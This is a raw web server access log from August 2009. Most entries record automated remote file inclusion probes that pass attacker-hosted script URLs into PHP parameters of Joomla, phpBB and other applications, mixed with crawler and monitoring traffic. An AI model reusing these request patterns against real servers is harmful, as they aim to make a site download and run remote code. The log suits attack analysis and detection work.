218.145.31.242 - - [03/Aug/2009:05:18:19 -0400] "GET /logs/index.php?pag=http://shanghaisisa.com/skin/mic.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
80.67.26.40 - - [03/Aug/2009:05:18:46 -0400] "GET /logs/access_log.Q109062300%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:18:46 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:18:46 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 200 12146 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:19:07 -0400] "GET /logs/access_log.Q109062300/////?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
174.143.240.203 - - [03/Aug/2009:05:19:26 -0400] "GET ///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:05:19:34 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
200.93.147.154 - - [03/Aug/2009:05:19:52 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.93.147.154 - - [03/Aug/2009:05:19:52 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
123.125.66.130 - - [03/Aug/2009:05:19:55 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
200.93.147.154 - - [03/Aug/2009:05:19:58 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.93.147.154 - - [03/Aug/2009:05:20:18 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.59.12.99 - - [03/Aug/2009:05:21:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.48.230.9 - - [03/Aug/2009:05:23:12 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:23:12 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:23:12 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:24:06 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:24:06 -0400] "GET /logs/access_log.Q109072500%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:24:06 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:24:08 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.212.186.138 - - [03/Aug/2009:05:24:46 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:24:46 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:24:46 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:24:46 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
210.48.230.9 - - [03/Aug/2009:05:24:48 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:24:48 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:24:48 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:25:15 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.115.213.221 - - [03/Aug/2009:05:25:48 -0400] "GET /logs/access_log.Q109062700///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
211.115.213.221 - - [03/Aug/2009:05:25:48 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
211.115.213.221 - - [03/Aug/2009:05:25:49 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 200 12144 "-" "libwww-perl/5.79"
211.115.213.221 - - [03/Aug/2009:05:25:49 -0400] "GET /logs/access_log.Q109062700///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
211.115.213.221 - - [03/Aug/2009:05:25:50 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
211.115.213.221 - - [03/Aug/2009:05:25:50 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 200 12144 "-" "libwww-perl/5.79"
67.212.186.138 - - [03/Aug/2009:05:25:52 -0400] "GET /logs///index.php?sourcedir=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:25:52 -0400] "GET /logs/access_log.Q109051900///index.php?sourcedir=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:25:52 -0400] "GET ///index.php?sourcedir=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:25:52 -0400] "GET /logs/access_log.Q109052300///index.php?sourcedir=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
209.59.12.99 - - [03/Aug/2009:05:26:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.240.203 - - [03/Aug/2009:05:27:30 -0400] "GET /logs/access_log.Q109063000/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:05:27:30 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:05:28:53 -0400] "GET /logs/error_log.Q109071900/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
218.145.31.242 - - [03/Aug/2009:05:29:16 -0400] "GET /logs/access_log.Q109051200//arcade.php?phpbb_root_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.145.31.242 - - [03/Aug/2009:05:29:21 -0400] "GET //arcade.php?phpbb_root_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 209 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.145.31.242 - - [03/Aug/2009:05:29:21 -0400] "GET /logs//arcade.php?phpbb_root_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.145.31.242 - - [03/Aug/2009:05:29:46 -0400] "GET /logs/error_log.Q109071100//arcade.php?phpbb_root_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.115.213.221 - - [03/Aug/2009:05:30:47 -0400] "GET /logs/access_log.Q109060800///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
211.115.213.221 - - [03/Aug/2009:05:30:56 -0400] "GET /logs/access_log.Q109060800///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
218.145.31.242 - - [03/Aug/2009:05:31:19 -0400] "GET //arcade.php?phpbb_root_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
218.145.31.242 - - [03/Aug/2009:05:31:19 -0400] "GET /logs//arcade.php?phpbb_root_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
218.145.31.242 - - [03/Aug/2009:05:31:19 -0400] "GET /logs/access_log.Q109051200//arcade.php?phpbb_root_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
209.59.12.99 - - [03/Aug/2009:05:31:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.145.31.242 - - [03/Aug/2009:05:32:22 -0400] "GET /logs/error_log.Q109071100//arcade.php?phpbb_root_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
207.58.163.86 - - [03/Aug/2009:05:32:22 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:32:22 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:32:22 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:32:23 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:32:23 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:32:23 -0400] "GET /logs/access_log.Q109072500%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:32:56 -0400] "GET /logs/access_log.Q109072400%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:05:33:05 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:05:33:05 -0400] "GET /logs/access_log.Q109071900//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:05:33:05 -0400] "GET /logs/error_log.Q109071900//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:05:33:05 -0400] "GET //include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:33:20 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:33:20 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:33:20 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:33:24 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:05:34:24 -0400] "GET //include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:05:34:24 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:05:34:24 -0400] "GET /logs/access_log.Q109071900%20%20//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:05:34:35 -0400] "GET /logs/access_log.Q109071900//searcharrays.php?addonDir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:05:34:35 -0400] "GET /logs/error_log.Q109071900//searcharrays.php?addonDir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.71.201 - - [03/Aug/2009:05:34:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01326B4234C54500ACA3081+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.140.23.185 - - [03/Aug/2009:05:34:50 -0400] "GET /logs/error_log.Q109062200%20%20//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.249.71.201 - - [03/Aug/2009:05:34:57 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L21720C4B24C5A5007A53043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.140.23.185 - - [03/Aug/2009:05:35:01 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:05:35:01 -0400] "GET //include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:05:35:01 -0400] "GET /logs/access_log.Q109071900//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:05:35:01 -0400] "GET /logs/error_log.Q109071900//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:35:06 -0400] "GET /logs//arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:35:06 -0400] "GET //arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:35:07 -0400] "GET /logs/access_log.Q109051200//arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.16 - - [03/Aug/2009:05:35:07 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01326B4235158500AAA3081+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.201 - - [03/Aug/2009:05:35:17 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01326B4234557500A6A3081+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.143.240.203 - - [03/Aug/2009:05:35:20 -0400] "GET /logs/access_log.Q109051900///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:05:35:20 -0400] "GET /logs///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
66.249.71.201 - - [03/Aug/2009:05:35:27 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2172BA4821B53500BEE304T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.201 - - [03/Aug/2009:05:35:38 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011B1F4C084599006612069+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [03/Aug/2009:05:36:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.229.87.245 - - [03/Aug/2009:05:36:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
83.229.87.245 - - [03/Aug/2009:05:36:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
66.249.71.201 - - [03/Aug/2009:05:36:57 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01326B4234A57500A6A3081+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.229.87.245 - - [03/Aug/2009:05:37:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
83.229.87.245 - - [03/Aug/2009:05:37:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
66.249.71.201 - - [03/Aug/2009:05:38:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2172BA4822050500BFE304T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.67.26.40 - - [03/Aug/2009:05:39:14 -0400] "GET /logs//arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:39:14 -0400] "GET //arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:39:18 -0400] "GET /logs/access_log.Q109052300//arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.110.19.24 - - [03/Aug/2009:05:39:59 -0400] "GET //arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.110.19.24 - - [03/Aug/2009:05:39:59 -0400] "GET /logs/access_log.Q109051200//arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.110.19.24 - - [03/Aug/2009:05:39:59 -0400] "GET /logs//arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
174.143.240.203 - - [03/Aug/2009:05:40:11 -0400] "GET /logs/access_log.Q109071300///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
83.229.87.245 - - [03/Aug/2009:05:40:55 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
83.229.87.245 - - [03/Aug/2009:05:40:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
66.249.71.201 - - [03/Aug/2009:05:41:08 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2172BA4822353500B5E304T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [03/Aug/2009:05:41:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.229.87.245 - - [03/Aug/2009:05:41:31 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
83.229.87.245 - - [03/Aug/2009:05:41:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
218.145.31.242 - - [03/Aug/2009:05:42:25 -0400] "GET /logs/access_log.Q109070500/index.php?pag=http://shanghaisisa.com/skin/mic.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
218.145.31.242 - - [03/Aug/2009:05:43:03 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
218.145.31.242 - - [03/Aug/2009:05:43:03 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
218.145.31.242 - - [03/Aug/2009:05:43:03 -0400] "GET //include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
218.145.31.242 - - [03/Aug/2009:05:43:12 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
218.145.31.242 - - [03/Aug/2009:05:43:12 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.145.31.242 - - [03/Aug/2009:05:43:12 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.145.31.242 - - [03/Aug/2009:05:43:12 -0400] "GET //include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
